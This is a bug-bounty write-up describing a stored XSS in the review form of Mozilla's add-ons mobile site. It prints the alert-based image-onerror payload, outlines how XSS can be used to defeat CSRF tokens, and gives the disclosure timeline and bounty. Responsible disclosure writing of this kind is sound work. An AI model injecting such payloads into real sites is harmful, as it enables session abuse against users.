Hi,
I am Paresh Parmar
This is my first writeUp.
So lets start.
It was 2016-02-09 , i was reading blog of Ashar javed. https://respectxss.blogspot.de/2016/01/persistent-xss-in-mozilla-add-ons-site.html
After reading that blog, i set my target to mozilla addons https://addons.mozilla.org/en-US/firefox/
it was mobile and xss days for me ;)
so i was hunting only mobile sites.
I am using this user-agent string
Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0.
So let's Go
After setting up target, i choosed review section endpoint for hunting.
For example: https://addons.mozilla.org/en-US/seamonkey/addon/mailbox-alert/reviews/
here you can write review about particular Addon!
so I gave 5 star to that addon :p and in review i wrote
"
<img src=x onerror=alert(document.domain)>
"And submitted review and bOom!!! XSS Executed.

.
Within two minutes, i found this simple Xss .
i reported this issue to https://bugzilla.mozilla.org/
After reporting this issue i started Digging into this
as far as i know, we can bypass CSRF protection of that page via Xss .
There's three step to Bypass csrf Token using Xss:
1. First request the form
2. Extract the valid csrf token
3. and submit the form using the valid csrf token
here's super Example about XMLHttpREQUEST https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequestReference : https://rileykidd.com/2013/09/09/using-xss-to-csrf/
After Only 12 Hours, they confirmed this issue. and in just 2 days they fixed this Issue
here's commit https://github.com/mozilla/addons-server/commit/455132c9a104c6907e5208054d0e2187d5d90ca8
For regarding bounty i sent email to security@mozilla.org along with bugzilla report id and Another Poc ;)
After Few Days, i got this mail

here's Video PoC:
TimeLine:
2016-02-09 13:35:54 PST - Report Sent
2016-02-10 07:10:17 PST - Confirmed
2016-02-11 08:53:31 PST - Fixed
2016-02-20 - Bounty Awarded 3000$
2016-02-10 07:10:17 PST - Confirmed
2016-02-11 08:53:31 PST - Fixed
2016-02-20 - Bounty Awarded 3000$
Special Thanks to Mozilla BugBounty/Bugzilla team.